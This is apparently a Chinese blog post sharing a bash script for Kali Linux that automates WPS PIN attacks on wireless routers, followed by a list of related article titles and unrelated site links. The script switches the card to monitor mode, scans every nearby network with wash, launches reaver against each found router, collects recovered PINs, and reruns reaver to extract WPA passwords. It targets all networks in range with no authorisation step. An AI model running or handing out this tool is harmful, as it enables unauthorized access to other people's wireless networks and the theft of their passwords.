kali-通过获取路由器pin码套取无线网络密码shell脚本
直接上脚本吧, 我做个笔记。
#*************************************************************************
# > File Name: wifi.sh
# > Author: chenglee
# > Main : chengkenlee@sina.com
# > Blog : http://www.cnblogs.com/chenglee/
# > Created Time : Tue 26 Mar 2019 09:30:16 PM CST
#*************************************************************************
#!/bin/bash wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'` function Wwash(){
echo "判断网卡是否以挂载..."
if [ -z "${wlanname}" ];then
echo "网卡没挂载, 请先手动挂载网卡"
exit;
else
echo "网卡已挂载,判断是否已启动监听模式"
#airmon-ng start ${wlanname}
wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
string="mon"
if [[ $wlanname =~ $string ]];then
echo "监听模式正常, 开始扫描附近无线网络..."
nohup wash -i ${wlanname} > logs/file 2>&1 &
else
echo "监听模式异常, 准备重启监听模式"
airmon-ng stop ${wlanname}
airmon-ng start ${wlanname}
echo "检查网卡监听模式状态"
if [[ $wlanname =~ $string ]];then
echo "监听模式正常, 开始扫描附近无线网络..."
nohup wash -i ${wlanname} > logs/file 2>&1 &
else
echo "定点异常,请插拔网卡后继续运行此脚本"
exit;
fi
fi
fi
}
function file(){
sleep 5;
num=`cat -n logs/file | grep BSSID | awk -F ' ' '{print$1}'`
number=`expr ${num} + 2`
nullnum=`sed -n ''"$number"',$p' logs/file | awk '/^$/{print NR}' | head -n 1`
if [ "$nullnum" = "" ];then
sed -n ''"$number"',$p' logs/file | awk -F ' ' '{print$1,$2}' > logs/file1
cat logs/file1 | awk -F ' ' '{print$1}' > logs/mac
cat logs/file1 | awk -F ' ' '{print$2}' > logs/ch
else
sed -n ''"$number"',$p' logs/file | awk -F ' ' '{print$1,$2}' > logs/file1
nullnu=`expr ${nullnum} - 1`
sed -n '1,'"$nullnu"'p' logs/file1 > logs/file2
cat logs/file2 | awk -F ' ' '{print$1}' > logs/mac
cat logs/file2 | awk -F ' ' '{print$2}' > logs/ch
fi
}
function Rreaver(){
wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
exec 3<"logs/mac"
exec 4<"logs/ch"
while read line1<&3 && read line2<&4
do
echo "后台分析物理地址为:${line1},信道为:${line2}的无线网络数据, 请稍后..."
nohup reaver -i ${wlanname} -b ${line1} -c ${line2} -vv -K 0 >> logs/${line1}.logs 2>&1 &
done
}
function analyse_PIN(){
lsatstring="logs"
exec 5<"logs/mac"
while read line3<&5
do
WPA_PIN=`cat logs/${line3}.${lsatstring} | grep WPA`
if [ "$WPA_PIN" = "" ];then
echo "${line3}-PIN码获取不到, 继续判断..."
else
echo "${line3}-PIN码获取成功!!PIN码:${WPA_PIN}"
echo "${line3}" >> logs/pin_mac 2>&1 &
echo "${WPA_PIN}" | awk -F ':' '{print$NF}' | sed 's/ //g' >> logs/pin_pin 2>&1 &
fi
done
}
function Ppin(){
wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
exec 6<"logs/pin_mac"
exec 7<"logs/pin_pin"
while read line4<&6 && read line5<&7
do
echo "开始通过(路由器):${line4},pin码:${line5},套取密码..."
nohup reaver -i ${wlanname} -b ${line4} -p ${line5} >> logs/${line5}.logs 2>&1 &
done
}
function pass(){
lsatstring="logs"
exec 8<"logs/pin_pin"
while read line6<&8
do
PassWord=`cat logs/${line6}.${lsatstring} | grep PSK`
if [ "$PassWord" = "" ];then
echo "PIN码为:${line6},密码获取失败, 继续获取..."
else
echo "PIN码为:${line6},密码获取成功,请前行 logs/${line6}.${lsatstring}文件查看相关 SSID,PASS等信息"
fi
done
}
function logs(){
if [ -d "logs" ];then
echo ""
Wwash
sleep 10;
file
else
echo ""
mkdir logs
Wwash
sleep 10;
file
fi
}
function main(){
#logs
#file
###############多重循环暴力区###############
#Rreaver
#analyse_PIN
#Ppin
#pass
###############多重循环暴力区###############
}
main
kali-通过获取路由器pin码套取无线网络密码shell脚本的更多相关文章
- 跑PIN码破解无线网络WIFI密码的原理分析(转)
你们家用的无线路由器安全吗?有人蹭网吗?无线路由器的漏洞在哪里?这么避免蹭网? 想要了解这些,必须要了解加密以及破解原理. 工具/原料 电脑 足够多足够好的wifi信号源 usb无线网卡(非必需) 一 ...
- Final——无线网络密码破解——WPA/WPA2
Final--无线网络密码破解--WPA/WPA2 20154305 齐帅 ↓ ↓ ↓ * # % & 郑 重 声 明 & % # * ↓ ↓ ↓ 本实验教程用于探索无线路由安全漏洞, ...
- 破解无线网络密码-BT3如何使用2
本教程只作学习和交流使用,任何其它商用与本人无关, 在开始教程之前, 首先需要用到几个软件,感兴趣的朋友看完贴子后可以去百度搜一下下载地址, 虚拟机: VMware Workstation 6.5 正 ...
- kali拿取路由器pin码
前序:拿pin码就可以直接跑出WPA PSK, 下面开始记录我的操作过程. 网卡监控模式 airmon-ng start wlan0 扫描 wash -i wlan0mon 破pin 网卡 物理地址 ...
- kali 系列学习12-使用Wifite破解无线网络
一些破解无线网络程序是使用Aircrack-ng工具集,并添加了一个图形界面或使用文本菜单的形式来破解无线网络.这使得用户使用它们更容易,而且不需要记住任何命令.本节将介绍使用命令行工具Wifite, ...
- 使用Reaver加PIN码秒破WPA-PSK密码
之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式,而能否破解出wpa密码完全依赖于字典强度了.除了该方式外还有一个更有效的办法,就是使用路由P ...
- 破解无线网络密码-BT3如何使用3
BT3 虚拟机 SNOOPWEP2 破解无线网络WEP密钥图解 1.下载BT3 光盘映像文件(ISO格式),比如:bt3-final.iso: 用WinISO 或 UltraISO(这个还支持DVD ...
- WPA-PSK无线网络密码破解原理
1.基于WPA2的加密标准还是能够被破解,一个弊端是他无法避开时候双方验证的模式来认证取得合法性的连接,当我们抓取足够多得双反认证的数据包之后就可以破解密码.之前很多片的博客写了如何破解这种加密的秘钥 ...
- 【Android M】获取屏幕锁定的相关信息:“无”,“滑动”,“PIN码”,"图案","密码"
ENV: Android M 6.0.1 import android.os.UserHandle; import com.android.internal.widget.LockPa ...
随机推荐
- PHP字符串处理 单引号 双引号 heredoc nowdoc 定界符
---恢复内容开始--- 2019年2月22日09:49:54 参考文档: http://php.net/manual/zh/language.types.string.php#language. ...
- 让 Python 的1、数据库查询返回字典记录--- 2、利用zip函数将两个列表(list)组成字典(dict)
让 Python 的数据库查询返回字典记录: https://yanbin.blog/python-database-query-return-dictionary-result/#more-9179 ...
- 报文分析5、UDP协议的头结构
UDP协议的头结构 源端口(2字节) 目的端口(2字节) 封报长度(2字节) 校验和(2字节) 数据 (1)源端口(Source Port):16位的源端口域包含初始化通信的端口号.源端口和IP地址的 ...
- [ipsec][crypto] 在IPSec ESP使用AES-GCM加密时的IV
IV IV是指初始化向量. 在我们当前讨论的场景中: 在IPSec ESP使用AES-GCM加密 IV有两个含义: 1. ESP报文封装时的IV,RFC中称为 AES-GCM IV +-+-+-+-+ ...
- AES加密的S盒和逆S盒的推导代码备份(C实现)
摘取自https://www.cnblogs.com/Junbo20141201/p/9369860.html,感谢原作者的详细解读. #include <stdio.h> ][] = { ...
- Hadoop集群测试wordcount程序
一.集群环境搭好了,我们来测试一下吧 1.在java下创建一个wordcount文件夹:mkdir wordcount 2.在此文件夹下创建两个文件,比如file1.txt和file2.txt 在fi ...
- 基于Spark自动扩展scikit-learn (spark-sklearn)(转载)
转载自:https://blog.csdn.net/sunbow0/article/details/50848719 1.基于Spark自动扩展scikit-learn(spark-sklearn)1 ...
- 用python脚本获取运行环境中的module 列表
由于脚本运行在远程环境,总报错说一些module没有.所以决定彻底对环境进行一次摸底. 于是,用如下代码即可实现: #!/usr/bin/env python import sys try: #pri ...
- 从零开始一起学习SLAM | 掌握g2o顶点编程套路
点"计算机视觉life"关注,置顶更快接收消息! ## 小白:师兄,上一次将的g2o框架<从零开始一起学习SLAM | 理解图优化,一步步带你看懂g2o代码>真的很清晰 ...
- notify.min.js
/*! * @wcjiang/notify v2.0.11 * JS achieve the browser title flashing , scrolling, voice prompts , c ...